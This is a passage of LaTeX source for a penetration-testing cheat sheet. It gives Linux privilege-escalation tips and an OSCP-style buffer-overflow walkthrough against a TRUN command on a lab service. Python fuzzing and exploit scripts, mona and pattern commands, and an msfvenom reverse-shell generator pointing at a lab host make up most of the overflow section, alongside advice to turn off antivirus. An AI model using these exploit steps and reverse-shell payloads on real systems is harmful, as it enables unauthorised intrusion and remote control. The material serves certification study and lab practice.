Script\{\{/link\}\} \tn % Row Count 15 (+ 15) % Row 22 \SetRowColor{white} Linux Privilege Escalation Checklist & \{\{fa-bolt\}\} \{\{link="https://j-s-tymchuk.gitbook.io/penetration-testing-playbook/privilege-escalation/linux-privilege-escalation"\}\}Guide to follow if stuck\{\{/link\}\} \tn % Row Count 24 (+ 9) % Row 23 \SetRowColor{LightBackground} Linux Priv Esc & \{\{fa-bolt\}\} Kernel exploits : uname -a \{\{fa-bolt\}\} Execute command as root : Sudo -l \{\{fa-bolt\}\} Find binary we can execute as root : SUID \{\{fa-bolt\}\} check cronjobs , monitor linux system : PSPY64 \tn % Row Count 34 (+ 10) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Privilege escalation (cont)}} \tn % Row 24 \SetRowColor{LightBackground} Few things to remember & \{\{fa-bolt\}\} If root is executing a File and we can access that file then we can get a reverse shell, Mostly cron jobs can be exploited like this OR if you can execute the file as root but cant write it then delete it and execute to get a reverse shell \tn % Row Count 13 (+ 13) % Row 25 \SetRowColor{white} Linux Priv Esc via Capability (getcap) & \{\{fa-bolt\}\} To identify if it exist type getcap -r / 2\textgreater{}/dev/null \tn % Row Count 17 (+ 4) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{New Page}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{1}{x{8.4cm}}{} \tn % Row Count 0 (+ 0) \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Buffer Overflows (OSCP procedure)}} \tn % Row 0 \SetRowColor{LightBackground} Steps & Commands \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} References πŸ’€ & \{\{fa-bolt\}\} \{\{link="https://tcm-sec.com/buffer-overflows-made-easy/"\}\}Cybermentor BoF Notes\{\{/link\}\} \{\{nl\}\}\{\{fa-bolt\}\} \{\{link="https://github.com/gh0x0st/Buffer\_Overflow"\}\}Buffer Overflow Guide\{\{/link\}\} \tn % Row Count 12 (+ 11) % Row 2 \SetRowColor{LightBackground} 1. SPIKING | Testing commands to find vulnerable & πŸ’€ We are trying to test multiple commands and try to find what's vulnerable. \{\{nl\}\}\{\{fa-bolt\}\}For ex for TRUN function \{\{nl\}\} \{\{fa-bolt\}\}─(rootπŸ’€Kali)-{[}\textasciitilde{}/Koth{]} \{\{nl\}\} \{\{fa-bolt\}\}└─\# cat spike.spk \{\{nl\}\} \{\{fa-bolt\}\}s\_readline(); \{\{nl\}\} \{\{fa-bolt\}\}s\_string("TRUN "); \{\{nl\}\} \{\{fa-bolt\}\}s\_string\_variable("0"); \{\{nl\}\} \tn % Row Count 31 (+ 19) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Buffer Overflows (OSCP procedure) (cont)}} \tn % Row 3 \SetRowColor{LightBackground} & \{\{fa-bolt\}\}Attacking Machine \{\{nl\}\}\{\{fa-bolt\}\}nc -nv 10.0.2.14 9999 \{\{nl\}\}\{\{fa-bolt\}\}generic\_send\_tcp 10.0.2.14 9999 spike.spk 0 0 \{\{nl\}\}\{\{fa-bolt\}\} Lookout for Buffer Overflow in Registers \tn % Row Count 10 (+ 10) % Row 4 \SetRowColor{white} 2. FUZZING | Crash The Application & πŸ’€ We will now go ahead and attack that command specifically in FUZZING \{\{fa-bolt\}\} When The Registers Gets Crashes and we see TRUN being affected \{\{nl\}\}\{\{fa-bolt\}\} We will stop the exploit via ctrl+c to stop it and we will get an estimate of at what bytes the TRUN got affected \{\{nl\}\}\{\{fa-bolt\}\} Like its 2800 bytes -\textgreater{} we can round off and make it 3000 \tn % Row Count 28 (+ 18) % Row 5 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{` \#!/usr/bin/python\{\{nl\}\} import sys, socket\{\{nl\}\} from time import sleep\{\{nl\}\} buffer = 'A' {\emph{ 100\{\{nl\}\} while True:\{\{nl\}\} try:\{\{nl\}\} \seqsplit{ s=socket.socket(socket.AF\_INET},socket.SOCK\_STREAM)\{\{nl\}\} s.connect(('10.0.2.14',9999))\{\{nl\}\} s.send(('TRUN /.:/' + buffer))\{\{nl\}\} s.close()\{\{nl\}\} sleep(1)\{\{nl\}\} buffer = buffer + 'A' }} 100\{\{nl\}\} except:\{\{nl\}\} print("Fuzzing crashed at \%s bytes" \% str(len(buffer)))\{\{nl\}\} sys.exit()\{\{nl\}\} `} \tn % Row Count 37 (+ 9) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Buffer Overflows (OSCP procedure) (cont)}} \tn % Row 6 \SetRowColor{LightBackground} & \{\{fa-bolt\}\} Goal : Is to know approximately to know where we crashed at, what bytes \{\{nl\}\} \{\{fa-bolt\}\} Once it break print out an exception, Fuzzing crashed at X bytes \{\{nl\}\} \{\{fa-bolt\}\} Now we will be finding where the EIP is at, we are gonna use a tool \tn % Row Count 13 (+ 13) % Row 7 \SetRowColor{white} 3. FINDING THE OFFSET | Find EIP & πŸ’€ First we will use pattern\_create msf tool we created 3000 bytes , then run exploit.py. After that we will use pattern\_offset by specifying the value of EIP which will be within those 3000 bytes To grab the offset \tn % Row Count 24 (+ 11) % Row 8 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{\{\{fa-bolt\}\} Tool : Pattern Create \seqsplit{`/usr/share/metasploit-framework/tools/exploit/pattern\_create}.rb -l 3000` \{\{nl\}\} \{\{nl\}\} `\#!/usr/bin/python import sys, socket \{\{nl\}\} offset = (' ') \{\{nl\}\} try: \{\{nl\}\} \seqsplit{s=socket.socket(socket.AF\_INET},socket.SOCK\_STREAM) \{\{nl\}\} s.connect(('10.0.2.14',9999)) \{\{nl\}\} s.send(('TRUN /.:/' + offset)) \{\{nl\}\} s.close() \{\{nl\}\} except: \{\{nl\}\} print("Error Connecting to the Server") \{\{nl\}\} sys.exit()` \{\{nl\}\}\{\{nl\}\} \{\{fa-bolt\}\} Tool : Pattern Offset `pattern\_offset.rb -l 3000 -q \textless{}VALUE/FINDING\textgreater{} from EIP`} \tn % Row Count 36 (+ 12) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Buffer Overflows (OSCP procedure) (cont)}} \tn % Row 9 \SetRowColor{LightBackground} & \{\{fa-bolt\}\} Goal: This offset information is critical because now we know that at this byte we can control the EIP, We will overwrite it with specific bytes \{\{nl\}\} \{\{fa-bolt\}\} This offset information is critical because now we know that at this byte we can control the EIP, \{\{nl\}\}\{\{fa-bolt\}\} Now we will overwrite it with specific bytes \tn % Row Count 17 (+ 17) % Row 10 \SetRowColor{white} 4. OVERWRITING THE EIP | Control ESP & πŸ’€ We discovered that the offset is at 2003 bytes, \{\{nl\}\} \{\{fa-bolt\}\}It means there are 2003 bytes right before, EIP begins \tn % Row Count 24 (+ 7) % Row 11 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{` \#!/usr/bin/python \{\{nl\}\} import sys, socket \{\{nl\}\} shellcode = 'A' {\emph{ 2003 + 'B' }} 4\{\{nl\}\} try:\{\{nl\}\} \seqsplit{s=socket.socket(socket.AF\_INET},socket.SOCK\_STREAM)\{\{nl\}\} s.connect(('10.0.2.14',9999))\{\{nl\}\} s.send(('TRUN /.:/' + shellcode))\{\{nl\}\} s.close()\{\{nl\}\} except:\{\{nl\}\} print("Error Connecting to the Server")\{\{nl\}\} sys.exit()\{\{nl\}\} `} \tn % Row Count 32 (+ 8) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Buffer Overflows (OSCP procedure) (cont)}} \tn % Row 12 \SetRowColor{LightBackground} & \{\{fa-bolt\}\} Goal : Control this EIP now \{\{nl\}\}\{\{fa-bolt\}\} TRUN got filled with a bunch of As \{\{nl\}\}\{\{fa-bolt\}\} EBP, bottom is filled with 41414141 \{\{nl\}\}\{\{fa-bolt\}\} EIP, return is filled with 42424242 \{\{nl\}\}\{\{fa-bolt\}\} Now, we only sent bytes of Bs and they all landed up in EIP \tn % Row Count 15 (+ 15) % Row 13 \SetRowColor{white} 5. FINDING THE BAD CHARACTERS in HexDump, Note them \& x00 is a bad char & \{\{fa-bolt\}\}\{\{link="https://www.ins1gn1a.com/identifying-bad-characters"\}\} Manually Identify Bad Chars \{\{/link\}\} \{\{nl\}\} After running the script, EIP will be same 4242 but we will work on Hexdump to find bad guys. \{\{nl\}\} \{\{fa-bolt\}\} Sequence Flow : 1-9 -\textgreater{} a-f -\textgreater{} 10-19 -\textgreater{} 1a-1f -\textgreater{} 20-29 -\textgreater{} 2a-2f \{\{nl\}\} \{\{fa-bolt\}\} Add string with badchar + "blacklist" To identify End of Buffer \tn % Row Count 34 (+ 19) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Buffer Overflows (OSCP procedure) (cont)}} \tn % Row 14 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{` \#!/usr/bin/python \{\{nl\}\} import sys, socket \{\{nl\}\} badchar = ("\textbackslash{}x01\textbackslash{}xff") \#all bad char will be sent\{\{nl\}\} shellcode = 'A' {\emph{ 2003 + 'B' }} 4 + badchar \{\{nl\}\} try:\{\{nl\}\} \seqsplit{ s=socket.socket(socket.AF\_INET},socket.SOCK\_STREAM) \{\{nl\}\} s.connect(('10.0.2.14',9999))\{\{nl\}\} s.send(('TRUN /.:/' + shellcode))\{\{nl\}\} s.close()\{\{nl\}\} except:\{\{nl\}\} print("Error Connecting to the Server")\{\{nl\}\} sys.exit()\{\{nl\}\} `} \tn % Row Count 9 (+ 9) % Row 15 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{x \{\{nl\}\} 01 - 09~ ~ 20 - 29~ ~ 40 - 49~ ~ 60 - 69~ ~ 80 - 89 \{\{nl\}\} 0a - 0f~ ~ ~ 2a - 2f~ ~ 4a - 4f~ ~ ~ 6a - 6f~ ~ 8a - 8f \{\{nl\}\} 10 - 19~ ~ 30 - 39~ ~ 50 - 59~ ~ 70 - 79~ ~ 90 - 99 \{\{nl\}\} 1a - 1f~ ~ ~ 3a - 3f~ ~ 5a - 5f~ ~ ~ 7a - 7f~ ~ 9a - 9f \{\{nl\}\} x \{\{nl\}\} a0 - a9~ ~ c0 - c9~ ~ e0 - e9 \{\{nl\}\} aa - af~ ~ ~ ca - cf~ ~ ea - ef \{\{nl\}\} b0 - b9~ ~ d0 - d9~ ~ f0 - f9 \{\{nl\}\} ba - bf~ ~ ~ da - df~ ~ fa - ff \{\{nl\}\} x} \tn % Row Count 24 (+ 15) % Row 16 \SetRowColor{LightBackground} & \{\{fa-bolt\}\} Goto HexDump, by Right click ESP (top) in register \textgreater{} Follow Dump \textgreater{} Ok \{\{nl\}\} \{\{fa-bolt\}\} We will go through this whole list \{\{nl\}\} \{\{fa-bolt\}\} We see if there is anything out of place now \{\{nl\}\} \{\{fa-bolt\}\} We got 01 02 03 ..B0.. ..B0.. B6 B7 B8. We have B4 and B5 Missing -\textgreater{} Those are Bad Characters \{\{nl\}\}\{\{fa-bolt\}\} This is EYE TEST, We Need to make sure we find everything, which is out of place \tn % Row Count 45 (+ 21) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Buffer Overflows (OSCP procedure) (cont)}} \tn % Row 17 \SetRowColor{LightBackground} 6. FINDING THE RIGHT MODULE | Find JMP ESP & πŸ’€ Goal : To find a JMP ESP that we will use to tell the application to execute our code. \{\{nl\}\} \{\{fa-bolt\}\} mona modules \textgreater{} Select all with False, means no memory protection in this module \tn % Row Count 10 (+ 10) % Row 18 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{`!mona modules` \{\{nl\}\} `nasm\_shell -\textgreater{} JMP ESP` \{\{nl\}\}`!mona find -s "\textbackslash{}xff\textbackslash{}xe4" -m essfunc.dll` \{\{nl\}\} \{\{fa-bolt\}\} rclick on panel \textgreater{} search for the return address we found \{\{nl\}\}\{\{fa-bolt\}\} It will have JMP ESP \& FFE4 location \{\{nl\}\}\{\{fa-bolt\}\} F2 \textgreater{} Put a break point \{\{nl\}\}} \tn % Row Count 16 (+ 6) % Row 19 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{` \#!/usr/bin/python \{\{nl\}\} import sys, socket \{\{nl\}\} \#625011AF\{\{nl\}\} shellcode = 'A' * 2003 + '\textbackslash{}xaf\textbackslash{}x11\textbackslash{}x50\textbackslash{}x62'\{\{nl\}\} try:\{\{nl\}\} \seqsplit{s=socket.socket(socket.AF\_INET},socket.SOCK\_STREAM)\{\{nl\}\} s.connect(('10.0.2.14',9999))\{\{nl\}\} s.send(('TRUN /.:/' + shellcode))\{\{nl\}\} s.close()\{\{nl\}\} except:\{\{nl\}\} print("Error Connecting to the Server")\{\{nl\}\} sys.exit()\{\{nl\}\} `} \tn % Row Count 25 (+ 9) % Row 20 \SetRowColor{white} & πŸ’€ Finally, we were able to provide EIP an valid return address JMP ESP where it can point to in the memory \{\{nl\}\} \{\{fa-bolt\}\} Ran our script with that Pointer address, affecting directly EIP area \{\{nl\}\} \{\{fa-bolt\}\} Changed EIP return address - DONE! \tn % Row Count 38 (+ 13) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Buffer Overflows (OSCP procedure) (cont)}} \tn % Row 21 \SetRowColor{LightBackground} 7. GENERATING SHELLCODE & πŸ’€ Our EIP will point to the JMP ESP, which will run our malicious shellcode and give us root (hopefully). \{\{nl\}\}`msfvenom -p \seqsplit{windows/shell\_reverse\_tcp} LHOST=10.0.2.5 LPORT=4444 EXITFUNC=thread -f c -a x86 -b "\textbackslash{}x00"` \tn % Row Count 11 (+ 11) % Row 22 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{` \#!/usr/bin/python \{\{nl\}\} import sys, socket \{\{nl\}\} overflow = ("Inside this malicious shellcode") \{\{nl\}\} shellcode = 'A' {\emph{ 2003 + '\textbackslash{}xaf\textbackslash{}x11\textbackslash{}x50\textbackslash{}x62' + '\textbackslash{}x90' }} 32 + overflow \{\{nl\}\} try: \{\{nl\}\} \seqsplit{ s=socket.socket(socket.AF\_INET},socket.SOCK\_STREAM) \{\{nl\}\} s.connect(('10.0.2.14',9999)) \{\{nl\}\} s.send(('TRUN /.:/' + shellcode)) \{\{nl\}\} s.close() \{\{nl\}\} except: \{\{nl\}\} print("Error Connecting to the Server") \{\{nl\}\} sys.exit() \{\{nl\}\} `} \tn % Row Count 20 (+ 9) % Row 23 \SetRowColor{LightBackground} & πŸ’€ Shellcode need 4 things \{\{nl\}\} \{\{fa-bolt\}\} 1. The exact number of bytes to crash (Crash Point) \{\{nl\}\}\{\{fa-bolt\}\} 2. The value of the JMP ESP that will instruct the application to execute our code (Return Address) \{\{nl\}\}\{\{fa-bolt\}\} 3. Padding (No-opn) \{\{nl\}\}\{\{fa-bolt\}\} 4. shellcode to grab reverse shell \tn % Row Count 36 (+ 16) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Buffer Overflows (OSCP procedure) (cont)}} \tn % Row 24 \SetRowColor{LightBackground} 8. ROOT | Exploit & \{\{fa-bolt\}\} Check real-time protection is off \& Antivirus while playing with this method \{\{nl\}\} \{\{fa-bolt\}\} \textbackslash{}x41, \textbackslash{}x42, \textbackslash{}x43 - The hexadecimal values for A, B and C. \tn % Row Count 9 (+ 9) % Row 25 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{\{\{fa-bolt\}\}{\emph{Anatomy of Stack : EBEE}} \{\{nl\}\}\{\{fa-bolt\}\}ESP (Extended Stack Pointer) : Its at the TOP \{\{nl\}\}\{\{fa-bolt\}\}Buffer Space : Fills and goes downward, should stop before EBP \& EIP \{\{nl\}\}\{\{fa-bolt\}\}EBP (Extended Base Pointer) : Its at the BOTTOM \{\{nl\}\}\{\{fa-bolt\}\}EIP (Extended Instruction Pointer) : Its the Return Address} \tn % Row Count 16 (+ 7) % Row 26 \SetRowColor{LightBackground} \{\{fa-bolt\}\} ESP & \{\{fa-bolt\}\} The Extended Stack Pointer (ESP) is a register that lets you know where on the stack you are and allows you to push data in and out of the application. \tn % Row Count 25 (+ 9) % Row 27 \SetRowColor{white} \{\{fa-bolt\}\} EIP & \{\{fa-bolt\}\} Its the Return Address, and we can use this address to point to directions. It can be malicious code to gain reverse shell \{\{nl\}\}\{\{fa-bolt\}\} The Extended Instruction Pointer (EIP) is a register that contains the address of the next instruction for the program or command. \tn % Row Count 40 (+ 15) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Buffer Overflows (OSCP procedure) (cont)}} \tn % Row 28 \SetRowColor{LightBackground} \{\{fa-bolt\}\} JMP & \{\{fa-bolt\}\} The Jump (JMP) is an instruction that modifies the flow of execution where the operand you designate will contain the address being jumped to. \tn % Row Count 8 (+ 8) \hhline{>{\arrayrulecolor{DarkBackground}}--} \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{1 Spiking : Method to find the vulnerable part of the program \newline 2 Fuzzing : We will send a bunch of characters to the program to check if it breaks it \newline 3 Finding the Offset : If we break it, we want to find out the point at which we break it \newline 4 Overwriting the EIP : We will use that offset to override the EIP, that pointer address can be controlled \newline + EIP controlled, 2 \newline {\emph{ 5 Finding Bad Character \newline }} 6 Finding the Right Module \newline 7 Generating Shellcode \newline + Root} \tn \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} % That's all folks \end{multicols*} \end{document}